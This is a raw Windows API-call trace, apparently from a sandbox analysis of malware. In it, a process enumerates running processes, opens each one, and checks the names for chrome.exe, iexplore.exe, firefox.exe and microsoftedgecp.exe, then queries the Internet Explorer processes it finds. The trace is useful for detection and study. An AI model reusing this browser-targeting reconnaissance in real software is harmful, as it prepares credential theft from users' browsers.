	[0240.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.485] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0240.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x82d4
	[0240.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.486] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0240.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.487] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.487] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0240.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.487] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0240.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x82d8
	[0240.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.488] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0240.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.489] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.489] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0240.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.490] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0240.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x82dc
	[0240.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.491] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0240.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.492] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.492] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0240.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.493] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0240.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x82e0
	[0240.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.494] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0240.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.494] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.495] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0240.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.495] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.495] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0240.496] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x82e4
	[0240.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.496] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0240.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.496] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.497] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0240.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.497] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0240.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x82e8
	[0240.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.498] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0240.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.498] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.499] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0240.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.499] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0240.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x82ec
	[0240.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.501] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0240.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.501] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.502] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0240.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.503] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0240.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x82f0
	[0240.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.505] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0240.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.505] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.506] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0240.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.506] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0240.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x82f4
	[0240.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.508] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0240.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.508] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.509] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0240.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.510] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0240.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x82f8
	[0240.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.511] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0240.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.512] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.512] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0240.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.513] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x82fc
	[0240.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.514] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.514] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.515] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.515] NtQueryInformationProcess (in: ProcessHandle=0x82fc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.515] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8300
	[0240.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.517] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.517] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.517] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.518] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.518] NtQueryInformationProcess (in: ProcessHandle=0x8300, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.518] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8304
	[0240.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.519] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.519] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.520] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.520] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0240.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8308
	[0240.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.524] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0240.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.525] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.525] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0240.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.525] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x830c
	[0240.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.526] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.527] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.527] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.528] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8310
	[0240.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.529] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.530] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.530] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.531] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8314
	[0240.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.532] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.532] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.532] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.533] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.533] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8318
	[0240.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.535] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.535] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x831c
	[0240.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.536] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.537] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.537] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.537] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8320
	[0240.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.538] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.539] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.539] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.540] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0240.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8324
	[0240.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.541] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0240.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.541] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.541] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0240.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.542] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0240.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8328
	[0240.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.543] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.544] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.544] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.544] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0240.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x832c
	[0240.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.545] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0240.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.546] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.546] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0240.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.546] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8330
	[0240.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.547] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.548] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
